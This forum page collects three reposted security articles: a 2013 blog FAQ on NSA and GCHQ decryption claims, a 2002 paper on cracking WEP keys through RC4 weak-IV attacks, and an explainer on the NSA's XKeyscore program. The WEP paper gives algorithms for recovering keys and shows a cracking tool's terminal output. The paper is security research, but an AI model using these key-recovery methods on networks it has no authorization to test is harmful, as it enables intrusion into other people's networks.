-
Posts
18753 -
Joined
-
Last visited
-
Days Won
726
Everything posted by Nytro
-
NSA's (and GCHQ) Decryption Capabilities: Truth and Lies by Axelle Apvrille | September 06, 2013 Edward Snowden has revealed new information concerning the cryptographic capabilities of the NSA and GCHQ (TheGuardian, ProRepublica, leaking documents…). The CryptoGirl was bound to look into that topic Let’s go straight to the point and answer simple questions. Is cryptography unsecure? No, I don’t think so. Basically, cryptography is maths (prime numbers, finite fields, polynomials…), and maths are solid science with proofs and demonstrations. Cryptographic algorithms are only seldom broken (e.g MD5). What’s quite often “broken” are implementations, because implementations are imperfect representation of maths. Vulnerabilities range from implementations bugs (buffer overflows etc) to side channel attacks (i.e attacks based on the physical properties of the implementation such as differential power analysis, timing attacks…). Don’t believe me? This opinion of mine is backed by Bruce Schneier, who had access to NSA’s documents: ”They’re doing it primarily by cheating, not by mathematics.”. Yes, but they seem to be able to defeat SSL! Yes. Note that SSL is a security protocol, not a cryptographic algorithm. The documents released by Snowden confirms our fears regarding SSL. As we said in our previous blog, we believe they do it by getting private keys of given domains or performing man-in-the-middle attacks. They could also be using attacks such as BEAST, CRIME) or BREACH. SSL is so widely deployed that there is much peer review of the protocol (good), but also new vulnerabilities are exposed each year at security conferences. It seems quite likely that the NSA is aware of those vulnerabilities, perhaps even with a few 0-days. enigma crypto rotor Image courtesy of LaMenta3 via Flickr. Matthew Green says Microsoft CryptoAPI and OpenSSL are probably among the SSL libraries the NSA is the most likely to break into, and I agree with him. In particular, a few years ago I remember that OpenSSL checked certificate chains only up to 9 levels. Certificates for a given entity are issued by a higher authority, and the higher authority’s certificate is issued by an even higher authority. That’s the chain of trust. So, if you have 10 certificates in your chain, OpenSSL was unable to check the chain and you might claim to be God and would be trusted This was a documented issue, I haven’t checked if it has been fixed since. By the way, Bruce Schneier recommends usage of TLS (for those who don’t know, TLS is like “SSL 3.1”, it’s a newer version of SSL). It’s certainly better than SSL in terms of security, but I wouldn’t bet on it as there are (nearly) as many vulnerabilities. The NSA has supercomputers and excellent cryptographers. They can break the RSA algorithm I agree with the first sentence and disagree with the second Sure, they have powerful computers and cryptographers, but that’s not enough to break the RSA algorithm with 2048-bit keys (for instance, this is used in GPG). You need huge computational power to brute force RSA 2048. Currently, the RSA Factoring Challenge record is set to RSA 768, and that’s already tremendous work. I don’t think the NSA can do much better, and I don’t think they have better cryptographers than those of the entire world. People like Shamir, Rivest, Lenstra, Preneel, Coron, Boneh etc are just exceptional, and I would not think the NSA can influence such a diverse panel of scientists. In the specific case of RSA, however, note that improper usage or implementations may be insecure. For instance, signing with RSA 1024 with PKCS#1 and a low exponent is not safe. So, if you use your crypto library (OpenSSL, BouncyCastle etc) with those settings, too bad. Note that it’s not that RSA 1024 is insecure, but that particular combination. All cryptographic algorithms are designed to work in a specific well-designed context. If you use them outside that context, their security may fall apart. As developers say, RTFM The slides say they can do it! No. The information I read in the Guardian’s article in no way states the NSA has the ability to break RSA, nor AES etc. They say that “cryptanalytic capabilities are now coming on line” or that they have “groundbreaking capabilities”, which is far too vague. True, I haven’t had access to the full set of slides, so I might be missing something important. However, still, I would not trust those slides fully. Why? Because they don’t sound like technical slides from a cryptographer. Would a cryptographer write he has “groundbreaking capabilities”? No. That’s not the way cryptographers talk. They’d rather say “Breakable in o(2^n)” or something like that For me, the slides emanate from some high level manager. I guess all of us have already seen slides of products which actually do not really correspond to reality, huh? The NSA influences standards and puts backdoors in applications Yes, I believe this is possible. Matthew Green summarized it very well: “Cryptographers have always had complicated feelings about NIST, and that’s mostly because NIST has a complicated relationship with the NSA.” I however wonder exactly which 2006 standard the Guardian refers to. My guess would be that the same applies to (some) RFCs and IEEE standards such as P1363. Elliptic curve choices are indeed somewhat obscure and could typically have been influenced by the NSA. This is also in line with Bruce Schneier’s recommendation “Prefer conventional discrete-log-based systems over elliptic-curve systems; the latter have constants that the NSA influences when they can.” As for putting backdoors into programs, to some extent, I can personally guarantee this is true - and not only in the US! Some 15 years ago (waow…), I was a junior developer working on quite well-known encryption product. To comply with the French law and be able to commercialize the product, we had absolutely no other choice than to embed a backdoor for the French government. That backdoor enabled them to decrypt the session key and hence any document encrypted with the tool. I remember the product featured a label like “Approved by SCSSI” (French’s former SSI entity) which, in practice, meant it held the backdoor. In France, laws around cryptography are now less restrictive, but this is just to say I would not be surprised the US asks for key escrows. What tools can I use? Bruce Schneier provides several recommendations. See also this document. It’s also worth to have a look at Prism-break. I complement them with a table below of what I think - personal opinion - is secure or not. Unfortunately, “green” does not mean it is guaranteed to be secure. For instance, the implementation may be flawed. But it’s better than orange… – the Crypto Girl Sursa: Fortinet Blog | News and Threat Research NSA's (and GCHQ) Decryption Capabilities: Truth and Lies + https://www.schneier.com/blog/archives/2013/09/conspiracy_theo_1.html
-
Practical Exploitation of RC4 Weaknesses in WEP Environments Practical Exploitation of RC4 Weaknesses in WEP Environments February 22, 2002 by David Hulton <h1kari@dachb0den.com> - (c) Dachb0den Labs 2002 [http://www.dachb0den.com/projects/bsd-airtools.html] 1. Introduction This document will give a brief background on 802.11b based WEP weaknesses and outline a few additional flaws in rc4 that stem off of the concepts outlined in "Weaknesses in the Key Scheduling Algorithm of RC4" (FMS) and "Using the Fluhrer, Mantin, and Shamir Attack to Break WEP" (SIR) and describes specific methods that will allow you to optimize key recovery. This document is provided as a conceptual supplement to dweputils, a wep auditing toolset, which is part of the bsd-airtools package provided by Dachb0den Labs. The basic goal of the article is to provide technical details on how to effectively implement the FMS attack so that it works efficiently with both a small amount of iv collection time as well as cracking and processing time and to provide details on how other pseudo random generation algorithm (prga) output bytes reveal key information. 2. Background WEP is based on RSA's rc4 stream cipher and uses a 24-bit initialization vector (iv), which is concatenated with a 40-bit or 104-bit secret shared key to create a 64-bit or 128-bit key which is used as the rc4 seed. Most cards either generate the 24-bit iv using a counter or by using some sort of pseudo random number generator (prng). The payload is then encrypted along with an appended 32-bit checksum and sent out with the iv in plaintext as illustrated: 0 1 2 3 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | | | 802.11 Header | | | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | IV[0] | IV[1] | IV[2] | Key ID | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | . . . . . . SNAP[0] . . . . . | . . . . . SNAP[1] . . . . . . | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | . . . . . . SNAP[2] . . . . . | . . . . Protocol ID . . . . . | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . | | . . . . . . . . . . . . . Payload . . . . . . . . . . . . . . | | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | . . . . . . . . . . . 32-bit Checksum . . . . . . . . . . . . | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ . - denotes encrypted portion of packet After the data is sent out, the receiver simply concatenates the received iv with their secret key to decrypt the payload. If the checksum checks out, then the packet is valid. 2.1. Current Cracking Methods Essentially, most of the wep attacks out there these days are either based on brute forcing methods, often times including optimizations based on how the key is generated or by using a wordlist, or through statistical analysis of initialization vectors (ivs) and their first rc4 output byte, to setup conditions in the rc4 key scheduling algorithm (ksa) that reveal information about particular bytes in the secret key. 2.1.1. Brute Forcing Brute forcing has been proven to be an effective method of breaking wep, mainly thanks to all of the work done by Tim Newsham. This method basically consists of trying to decrypt the encrypted payload of a captured 802.11b packet using a set of keys and verifying the validity by seeing if the 32-bit checksum checks out. In most cases, if the key checks out it is important to check it with another packet to make sure the key is actually valid, since many times the packet can be decrypted with an invalid key and the checksum will be valid. This mode of attack generally only requires 2 packets. Tim Newsham's most effective cracking method stems off of the weaknesses in the password based key generation algorithm used by most 40-bit cards and access points. By taking advantage of this weakness, it reduces the 40-bit keyspace down to 21-bit, which is trivial to crack (20-40 seconds with most current-day machines). Also, wordlist attacks prove almost equally effective on both 40-bit and 104-bit 802.11b networks, provided you have a decent list of commonly used passphrases. Even without using these optimizations, you can still exhaust the entire 40-bit keyspace in roughly 45-days on a decent machine, or in a very reasonable amount of time using a distributed network of machines. Although this mode of attack can be applied to many networks out there, it fails to be able to attack a properly secured 104-bit network, since the amount of time required to brute force 104-bit is generally longer than an attacker's great-grandchildren would want to wait. 2.1.2. FMS Attack Up until now, all open source wep cracking utilities that use the FMS Attack have used an extremely limited mode of operation as described in FMS in Section 7.1 "IV Precedes the Secret Key", and is also published by Wagner in Wag95, which involves only looking for ivs that match: (A + 3, N - 1, X) This is a particular condition that works almost all of the time and is not dependent on the preceding keys. However, as described later on in FMS in Section A "Applying The Attack to WEP-like Cryptosystems", they recommend that you use the following equation on the S permutation immediately after the KSA to determine if an iv is weak: X = S{B + 3}[1] < B + 3 X + S{B + 3}[X] = B + 3 This equation uncovers many more ivs than the 256 per key that most implementations currently use. This was made obvious in SIR in Section 4.1 "Choosing IVs", but wasn't thoroughly expanded on about how to effectively use a pool of logged ivs to successfully perform this attack in a reasonable amount of time. The main dilemmas with applying this equation to all of the IVs that you collect are that you have to check all of your logged ivs at least once for every key byte that you try, and that it takes a considerable amount of resources to apply this algorithm to a set of 2,000,000 ivs. So, not only do you have to do a large amount of processing, but also for an extremely large set of possibilities. Also, all of the current implementations only attack the 1st rc4 output byte, mainly because it is the one that provides the most accurate information about the key bytes. However, by attacking the other bytes, it can also provide clues, although minute, to the static key that was used. This can sometime provide enough statistical data to derive key bytes in cases when you aren't able to collect a large amount of captured data, and have more time to spend processing. 3. Additional Flaws in the KSA The main flaw with rc4 that hasn't been thoroughly expanded, is using information provided by other bytes in the prga output stream. This attack is similar to the FMS attack, but requires additional processing because you have to also emulate portions of the pseudo random generation algorithm (prga) to determine if an iv gives out key information in byte A. However, the bytes that you can attack using this method directly depend on the bytes of the key you have already recovered and are extremely hard to predict without excessive processing. To demonstrate this, I will first provide background on the current common mode of attack which attacks the first output byte and then show how it can be expanded to other bytes. 3.1. Attacking the First Byte The first byte attack works based on the fact that you can simulate part of the ksa using the known iv and derive the values of elements in the S permutation that will only change 1 - (e ** -X) of the time, where X is the number of S elements that your attack depends on. This can be illustrated as follows when attacking the first byte in the secret key (SK): Definitions: KSA(K) Initialization: For i = 0 ... N - 1 S[i] = i j = 0 Scrambling: For i = 0 ... N - 1 j = j + S[i] + K[i mod l] Swap(S[i], S[j]) PRGA(K) Initialization: i = 0 j = 0 Generation Loop: i = i + 1 j = j + S[i] Swap(S[i], S[j]) Output z = S[S[i] + S[j]] - For demonstration purposes N = 16, although it is normally 256 - Also, all addition and subtraction operations are carried out modulo N and negative results are added with N so results are always 0 <= x < N. Simulation: let B = 0 - byte in K that we are attacking let IV = B + 3, f, 7 let SK = 1, 2, 3, 4, 5 let K = IV . SK let l = the amount of elements in K assume that no S elements get swapped when i > B + 3 KSA - K = 3, f, 8, 1, 2, 3, 4, 5 Known Portion: 0 1 2 3 4 5 6 7 8 9 a b c d e f j S[i] K 3 0 i = 0, j = 0 + 0 + 3 = 3 0 1 i = 1, j = 3 + 1 + f = 3 d 2 i = 2, j = 3 + 2 + 8 = d Unknown Portion: f 1 i = 3, j = d + 1 + 1 = f - Note that S[B + 3] always contains information relating to SK[B], since SK[B] is used to calculate j. PRGA - S = 3, 0, d, f, 4, 5, 6, 7, 8, 9, a, b, c, 2, e, 1 Unknown Portion: 0 1 2 3 4 5 6 7 8 9 a b c d e f j S[i] S[i] S[j] 3 0 d f 4 5 6 7 8 9 a b c 2 e 1 Unknown KSA Output 0 3 i = 1, j = 0 + 0 = 0, z = S[0 + 3] = f In this instance, f will be output as the first PRGA byte, which is in turn xor'ed with the first byte of the snap header. The first byte of the snap header is almost always 0xaa, so we can easily derive the original f by simply xor'ing the first byte in our encrypted payload with 0xaa. To reverse the f back into the first byte of the SK that was used to generate it, we just iterate through the KSA up until the point where we know the j and S[i] values that were used to derive the f as provided in the previous demonstration. Once the j and S[i] values are derived, we can easily reverse it to SK[B] as illustrated: Definitions: let S{-1}[Out] be the location of Out in the S permutation let Out be z in the first iteration of the PRGA assume values in Known Portion of KSA from where i = 2 SK[B] = S{-1}[Out] - j - S[i + 1] Application: SK[B] = S{-1}[f] - c - S[3] = f - d - 1 = 1 This method provides us with the correct key roughly e ** -3 =~ 5% of the time, and sometimes e ** -2 =~ 13% of the time in some cases when we only rely on 2 elements in the S permutation staying the same. As you can see in the ksa and prga simulation above, we only rely on elements 0, 1, and 3 not changing for the output byte to be reliable, so the probability of our output byte being f is 5%. By collecting many different SK[B] values the correct SK[B] values should become more evident as more data is collected. Additionally, once we determine the most probable value for the first byte in the secret key, we can apply the same algorithm to cracking the next byte in the secret key, and continue until we have cracked the entire secret key. In most implementations this method is combined with brute forcing so the odds don't have to be perfect in order to recover the key. 3.2. Attacking Additional Output Bytes This section will demonstrate a set of new unique ivs that provide clues to various bytes in the secret key and in some cases with greater probability than the first bytes. I will first demonstrate what happens when rc4 encounters one of these ivs, and then provide methods for detecting them. 3.2.1. RC4 Encounters a 2nd-Byte Weak IV In this demonstration, I will use a weak iv that attacks the 2nd byte and show how certain ivs setup the S permutation so that secret key information is revealed in the 2nd byte of output. This method also applies to other output bytes and can be expanded depending on which secret key byte you are attacking. Here is what happens: Simulation: let B = 0 - byte in K that we are attacking let IV = 4, c, c let SK = 1, 2, 3, 4, 5 let K = IV . SK assume that no S elements get swapped when i > B + 3 KSA - K = 4, c, c, 1, 2, 3, 4, 5 Known Portion: 0 1 2 3 4 5 6 7 8 9 a b c d e f j S[i] K 4 0 i = 0, j = 0 + 0 + 4 = 4 1 i = 1, j = 4 + 1 + c = 1 f 2 i = 2, j = 1 + 2 + c = f Unknown Portion: 3 i = 3, j = f + 3 + 1 = 3 PRGA - S = 4, 1, f, 3, 0, 5, 6, 7, 8, 9, a, b, c, d, e, 2 Unknown Portion: 0 1 2 3 4 5 6 7 8 9 a b c d e f j S[i] S[i] S[j] 4 1 f 3 0 5 6 7 8 9 a b c d e 2 Unknown KSA Output 1 i = 1, j = 0 + 1 = 1, z = S[1 + 1] = f f 4 i = 2, j = 1 + f = 0, z = S[f + 4] = 3 Then, since we also often times know that the second byte of the snap header is 0xaa, we can determine the 2nd byte of prga output and reverse it back to the original key, as demonstrated: SK[B] = S{-1}[3] - f - S[3] = 3 - f - 3 = 1 As you can see, this particular iv will setup the ksa and prga so that the second output byte provides information about the first byte of our key in almost every situation. Additionally, it relies on elements 0, 1, 2, and 3 not changing for the second byte to be accurate, so it will only be correct e ** -4 =~ 2% of the time. Additionally, in cases where the previous output bytes are derived from dependent elements, we can check to see if the actual outputted byte matches up and determine if the output we are receiving has been tampered with. In addition, if the output matches up, it greatly increases our odds since we now rely on less elements. In this particular case, if the first output byte checked out, it would increase our probability with the 2nd byte to e ** -2 =~ 13%. 3.2.2. Finding Weak IVs for Additional Output Bytes The main problem with attacking additional output bytes is determining if an iv will reveal part of the secret key in a particular output byte, and also determining if the probabilities are good enough to even consider it. How we can detect if an iv is vulnerable to this sort of attack is similar to the first byte attack, but it requires looping through the prga up until i = (A + 1) where A = the offset in the prga stream of the byte you know the value for. For each iteration of the prga loop, if there are any instances where j or i >= B + 3, we must discard the iv, since then we are relying on elements in the S permutation that will most likely change. This can be accomplished by modifying the prga algorithm so that it is similar to: PRGA(K) Initialization: For i = 0 ... N - 1 P[i] = 0 P[B + 3] = 1 i = 0 j = 0 Generation Loop: While i < A + 1 i = i + 1 j = j + S[i] If i or j >= B + 3 Then Fail Swap(S[i], S[j]) Output z = S[S[i] + S[j]] P[i] = 1 P[j] = 1 Verification: If S[i] + S[j] = B + 3 Then Success Probability Analysis: j = 0 For i = 0 ... N - 1 If P[i] > 0 Then j = j + 1 This algorithm also works almost identically to the equation for determining if an iv is vulnerable to the first byte attack and can be expanded to detecting ivs that reveal keys in any byte in the prga output. You can then weigh the probabilities and determine if it is worth considering. In tests, this method doesn't prove entirely useful, mainly due to the amount of processing that is required to determine if certain ivs have this property. Since each iv has to be checked for each previous secret key byte that you try, it would probably be most practical to manually derive a table of vulnerable ivs, so it doesn't require much work during key recovery. In most cases it'd be more practical to collect more ivs and only use the first bytes to perform key recovery, however in cases when you have a limited set of sample data, it could greatly reduce the time required for recovery. 4. Implementation This section will focus on practical methods for making use of all of the 1st byte weak ivs without hindering performance. It will also cover optimizations for applying brute forcing and fudging methods to greatly reduce cracking time. The result of the optimizations will allow you to perform key recovery with only 500,000-2,000,000 packets and < 1 minute processing time. Although, in SIR it is mentioned that they were able to crack wep with a similar number of packets, this mode of attack does not require that the wep key be ascii characters, and isn't dependent on what key generator the victim used. 4.1. Filtering Weak IVs The main problem with attacking wep using all of the first byte weak ivs, is that the equation specified in FMS has to be applied to each of the ivs for every key that you try. Since often times you'll have a total of 2,000,000 packets that you've collected and thousands of keys you need to try before you find the correct one. It has thus far been impractical to use this mode of attack, since it requires a large amount of memory as well as resources. The way I have managed to get around this dilemma is by analyzing the patterns of weak ivs and how they are related to the key bytes they rely on. This is the basic pattern that I've found. Definitions: let x = iv[0] let y = iv[1] let z = iv[2] let a = x + y let b = (x + y) - z Byte 0: x = 3 and y = 255 a = 0 or 1 and b = 2 Byte 1: x = 4 and y = 255 a = 0 or 2 and b = SK[0] + 5 Byte 2: x = 5 and y = 255 a = 0 or 3 and b = SK[0] + SK[1] + 9 a = 1 and b = 1 or 6 + SK[0] or 5 + SK[0] a = 2 and b = 6 Byte 3: x = 6 and y = 255 a = 0 or 4 and b = SK[0] + SK[1] + SK[2] + 14 a = 1 and b = 0 or SK[0] + SK[1] + 10 or SK[0] + SK[1] + 9 a = 3 and b = 8 Byte 4: x = 7 and y = 255 a = 0 or 5 and b = SK[0] + SK[1] + SK[2] + SK[3] + 20 a = 1 and b = 255 or SK[0] + SK[1] + SK[2] + 15 or SK[0] + SK[1] + SK[2] + 14 a = 2 and b = SK[0] + SK[1] + 11 or SK[0] + SK[1] + 9 a = 3 and b = SK[0] + 11 a = 4 and b = 10 This pattern can then be easily expanded into an equation that covers a range independent of what SK values you have. As a result, you have distribution pattern similar to the one shown below: Secret Key Byte 0 1 2 3 4 5 6 7 8 9 a b c + + + + + + 0 8 16 16 16 16 16 16 16 16 16 16 16 16 1 8 16 16 16 16 16 16 16 16 16 16 16 2 16 8 16 16 16 16 16 16 16 16 16 a 3 16 8 16 16 16 16 16 16 16 16 4 16 8 16 16 16 16 16 16 16 V 5 16 8 16 16 16 16 16 16 a 6 16 8 16 16 16 16 16 l 7 16 8 16 16 16 16 16 u 8 16 8 16 16 16 16 e 9 16 8 16 16 16 s a 16 8 16 16 b 16 8 16 c 16 8 d 16 8 - 8-bit set of weak ivs 16 - 16-bit set of weak ivs + - 2 additional x and y dependent 8-bit weak ivs From this, we can determine a rough estimate of how many total weak ivs exist for each key byte. It can also be determined using the following equation: let ? : be conditional operators let MAX(x, y) be x > y ? x : y ((B mod 2 ? MAX(B - 2, 0) + 2 : B + 1) * (2 ** 16)) + (((B mod 2 ? 0 : 2) + (B > 1 ? 1 : 0) + 1) * (2 ** 8)) However, our real objective is to determine an algorithm that allows us to filter out weak ivs based on the secret key byte that they can attack, so that we can narrow our 2,000,000 element table down to a reasonable size that's easier to search. This can be accomplished by using a simple algorithm similar to: let l = the amount of elements in SK i = 0 For B = 0 ... l - 1 If (((0 <= a and a < or (a = B and b = (B + 1) * 2)) and (B % 2 ? a != (B + 1) / 2 : 1)) or (a = B + 1 and (B = 0 ? b = (B + 1) * 2 : 1)) or (x = B + 3 and y = N - 1) or (B != 0 and !(B % 2) ? (x = 1 and y = (B / 2) + 1) or (x = (B / 2) + 2 and y = (N - 1) - x) : 0) Then ReportWeakIV This algorithm results in catching the following distribution of ivs: Byte # of IVs Probability 0 768 0.00004578 1 131328 0.00782776 2 197376 0.01176453 3 197120 0.01174927 4 328703 0.01959223 5 328192 0.01956177 6 459520 0.02738953 7 459264 0.02737427 8 590592 0.03520203 9 590336 0.03518677 a 721664 0.04301453 b 721408 0.04299927 c 852736 0.05082703 Which should differ slightly from the previous weak iv estimation equation since some ivs in the pattern overlap. By sorting these IVs into tables, you can very easily narrow down the amount of ivs to search for each cracking operation to a maximum of 852,736 ivs, or around only 101,654 when supplied with a 2,000,000 packet capture file. This effectively reduces the search time for each key by at least 1/20. 4.2. Fudging When trying to recover keys using a capture file that doesn't statistically provide enough immediate information to determine the secret key, it is common to perform a brute force based on the most probable key bytes. Up until now the fudge, or breadth, has been implemented as a static number that specifies the range to search for each key byte. However, with > 2,000,000 samples and a large amount of weak ivs for each byte the probability that the correct key will be the most probable gets greater as you traverse through each byte. A estimate of the probabilities for this are outlined below: Byte # of IVs Probability 0 768 0.00004578 1 768 0.00004578 2 2304 0.00013732 3 1792 0.00010681 4 3072 0.00018311 5 2560 0.00015259 6 4096 0.00024414 7 3584 0.00021362 8 5120 0.00030518 9 4608 0.00027466 a 6144 0.00036621 b 5632 0.00033569 c 6656 0.00039673 Therefore, when attempting to brute force based on a 2,000,000 sample set, your IVs will most likely be near: Byte # of IVs # of Correct Keys 0 92 5 1 92 5 2 275 14 3 214 11 4 366 18 5 305 15 6 488 24 7 427 21 8 610 30 9 549 27 a 732 36 b 671 33 c 793 39 Therefore, it's most likely that once you reach byte 2, the key that seems most probable, most likely is. This means that fudging is most likely not required, or at the least should be reduced, the farther you move through the bytes. This reduces the brute forcing time required considerably, since now it is only necessary to fudge the first few bytes of the key, and the rest is no longer necessary. I have found in most cases, because of this property of weak ivs, it requires quite less packets than 2,000,000 to recover the key, and in some cases you don't even require any statistics for the first couple bytes of the secret key to perform this attack in a very reasonable amount of time. 5. Results Using the outlined modifications, I've managed to crack wep using between 500,000 and 2,000,000 packets in under a minute, this is mainly due to the time required for reading in the packets. Here is an example of a successful attack using quite less than the 60 required ivs and only ~ 500,000 packets: h1kari@balthasar ~/bsd-airtools/dweputils/dwepcrack$ ./dwepcrack -w ~/log * dwepcrack v0.3a by h1kari <h1kari@dachb0den.com> * * Copyright (c) Dachb0den Labs 2002 [http://dachb0den.com] * reading in captured ivs, snap headers, and samples... done total packets: 500986 calculating ksa probabilities... 0: 22/768 keys (!) 1: 3535/131328 keys (!) 2: 5459/197376 keys (!) 3: 5424/197120 keys (!) 4: 9313/328703 keys (!) (!) insufficient ivs, must have > 60 for each key (!) (!) probability of success for each key with (!) < 0.5 (!) warming up the grinder... packet length: 44 init vector: 58:f7:26 default tx key: 0 progress: .................................... wep keys successfully cracked! 0: xx:xx:xx:xx:xx * done. 6. Conclusions The best solution for securing your wireless networks is using traditional wireless security to its fullest, but not relying on it. Manually enter in your wep keys and don't use the key generator (or use dwepkeygen ;-Q), change your wep keys frequently, use mac filtering and shared key authentication, and label your wireless network as untrusted (and no, I don't necessarily mean set your ssid to "untrusted"). Wireless networks, just like any other networks, are proportionately insecure to the stupidity of the person managing them. References [1] Fluhrer, S. Mantin, I. and Shamir A. - Weaknesses in the Key Scheduling Algorithm of RC4. [2] Stubblefield, A. Ioannidis, J. and Rubin, A. - Using the Fluhrer, Mantin, and Shamir Attack to Break WEP [3] Newsham, T. - Cracking WEP Keys. Presented at Blackhat 2001. Sursa: http://www.dartmouth.edu/~madory/RC4/wepexp.txt
-
XKeyscore: NSA’s Surveillance Program Bhavesh Naik September 09, 2013 Introduction The former contractor for NSA, Edward Snowden, became famous for revealing PRISM, a confidential mass surveillance program run by the U.S. agencies to eavesdrop on any electronic media. The whole world realized that Big Brother is real and, yes, he is watching you. It is not a fiction any longer. So what is XKeyscore, exactly? It’s a tool that can scour all things from the Internet for surveillance purposes. The purpose of XKeyscore is to allow analysts to search the metadata as well as the contents of email and other Internet activity, such as browser history. Analysts can also search by name, telephone number, IP address, keywords, and the language in which the Internet activity was conducted or the type of browser used. According to the slides published, XKeyscore is: DNI (digital network intelligence) exploitation system/analytic framework Performs strong (e.g., email) and soft (e.g., content) selection. In an interview in June, Edward Snowden elaborated on his statement about being able to read any individual’s email if he had their email address. He said the claim was based in part on the email search capabilities of XKeyscore, which Snowden says he was authorized to use while working as a Booz Allen contractor for the NSA. One of the top-secret documents describe how the program searches within the “bodies of emails, web pages and documents,” including the “To, From, CC, BCC lines” and “Contact-Us” pages on websites. Provides real-time activity Beyond emails, the XKeyscore system allows analysts to monitor a virtually unlimited array of other Internet activities, including those within social media. The DNI presenter enables an analyst using this tool to read the content of Facebook chats or private messages. “Rolling buffer” of ~3 days of ALL unfiltered data seen by XKeyscore: Stores full-take data at the collection site, indexed by meta-data Provides a series of viewers for common data types [*]Federated query system—one query scans all sites Performs full-take, allowing analysts to find targets that were previously unknown by mining metadata. Revealing When and Where? The program’s existence was most publicly revealed in July 2013 by Edward Snowden in The Sydney Morning Herald and O Globo newspapers. What Was Snowden’s Statement? “I, sitting at my desk, (can) wiretap anyone, from you or your accountant, to a federal judge or even the president, if I had a personal email address.” The Guardian (June 10). Legal vs. Technical Restrictions The FISA Amendments Act (2008) requires a warrant for targeting U.S. individuals, but NSA analysts are permitted to intercept the communications of such individuals without a warrant if they are in contact with one of the NSA’s foreign targets. The ACLU’s deputy legal director, Jameel Jaffer, told The Guardian that national security officials expressly said that a primary purpose of the new law was to enable them to collect large amounts of communications by Americans without individual warrants. The following example is provided by one XKeyscore document showing a NSA target in Tehran communicating with people in Frankfurt, Amsterdam, and New York. The working What can it do? According to The Washington Post and Marc Ambinder, editor of The Week, XKeyscore is a data retrieval system that consists of a series of interfaces, backend databases, software, and servers that select certain type of metadata that NSA has already collected, using other methods from wide range of different sources. F6, which is the SCS or special collection service, operating from a U.S embassy or consulate overseas. FORNSAT, which means “foreign satellite collection,” refers to intercepts from satellites that process data used by other countries. The special source operations, or the SSO, is a branch of NSA that taps cables, finds microwave paths, and otherwise collects data not generated by F6 or foreign satellites. A training slide on page 24 of the National Security Agency’s 2008 presentation on the program, states it quite baldly: Show me all exploitable machines in country X Fingerprints from TAO (tailored access operations) are loaded into XKeyscore’s application/fingerprinted engine. Data is tagged and databased. No strong-selector. Complex Boolean tasking and regular expression required. According to Ars Technica’s Sean Gallagher, “the vulnerability fingerprints are added to serve as a filtering criteria for XKeyscore’s app engines, comprised of a worldwide distributed cluster of Linux servers attached to the NSA’s Internet backbone tap points.” He explains how this could give the NSA a toehold of surveillance in various countries: “This could allow the NSA to search broadly for systems within countries such as China or Iran by watching for the network traffic that comes from them through national firewalls, at which point the NSA could exploit those machines to have a presence within those networks.” The slides explain how XKeyscore can track encrypted virtual private networks (VPN) sessions and their participants, can capture metadata on who’s using PGP (pretty good privacy) in email or who is encrypting their Word documents, which later can be decrypted. It keeps all trapped Internet traffic for three days, but the metadata is kept for up to 30 days. This one-month duration allows the authorities the time to trace the identity of those who created the documents. Further capabilities include Google Maps and web searches. It also has the ability to track the authorship and source of a particular document. Location Where is XKeyscore located? It works with the help of over 700 servers based in U.S. and allied military and other facilities as well as U.S. embassies and consulates in several dozen countries. Data Collection and Storage How much data is being collected? The quantity of communications accessible through programs such as Xkeyscore is staggeringly large. One NSA report from 2007 estimated that there were 850 billion “call events” collected and stored in the NSA database and close to 150 billion Internet records. Each day, the document says, 1 – 2 billion records were added. A 2010 Washington Post article reported that “everyday, collection systems at the [NSA] intercept and store 1.7 billion emails, phone records and other type of communications.” How long is the data stored? The XKeyscore system is collecting a vast amount of Internet data that can be stored only for short periods of time. Content remains on the system for three to five days. The metadata on the other hand is stored for 30 days. One document explains: “At some sites, the amount of data we receive per day (20 plus terabytes) can be only stored for as little as 24 hours.” In 2012, there were at least 41 billion records collected and stored in XKeyscore for a single 30 days of duration. What was NSA’s response? In a statement to The Guardian, the NSA said: “NSA’s activities are focused and specifically deployed against—and only against—legitimate foreign intelligence targets in response to requirements that our leaders need for information necessary to protect our nation and its interests. “XKeyscore is used as a part of NSA’s lawful foreign signals intelligence collection system. “Allegations of widespread, unchecked analyst access to NSA collection data are simply not true. Access to XKeyscore, as well as all of NSA’s analytic tools, is limited to only those personnel who require access for their assigned tasks … In addition, there are multiple technical, manual, and supervisory checks and balances within the system to prevent deliberate misuse from occurring.” “Every search by an NSA analyst is fully auditable, to ensure that they are proper and within the law. “These types of programs allow us to collect the information that enables us to perform our missions successfully—to defend the nation and to protect U.S. and allied troops abroad.” What’s more? Many more aspects of the XKeyscore are not revealed in depth, such as with which countries the U.S. shares information, how the program contends with encrypted contents, the evolving of the program in recent years. Despite all this, the government claims some real benefits, such as 300 terrorists captured by 2008. References: http://www.theguardian.com/world/2013/jul/31/nsa-top-secret-program-online-data http://nakedsecurity.sophos.com/2013/08/02/nsas-xkeyscore-is-a-global-dragnet-for-vulnerable-systems/ http://www.infowars.com/xkeyscore-instrument-of-mass-surveillance/ https://blog.fortinet.com/NSA-s-XKeyscore–the-FAQ/ http://www.huffingtonpost.com/sam-dorison/nsa-data-hacking_b_3708206.html http://en.wikipedia.org/wiki/XKeyscore http://www.schneier.com/blog/archives/2013/08/xkeyscore.html http://techcrunch.com/2013/07/31/nsa-project-x-keyscore-collects-nearly-everything-you-do-on-the-internet/ http://www.thehindu.com/news/international/world/nsas-xkeyscore-surveillance-program-has-servers-in-india/article4978248.ece http://assets.zocalo.com.mx/uploads/articles/6/137178470253.jpg 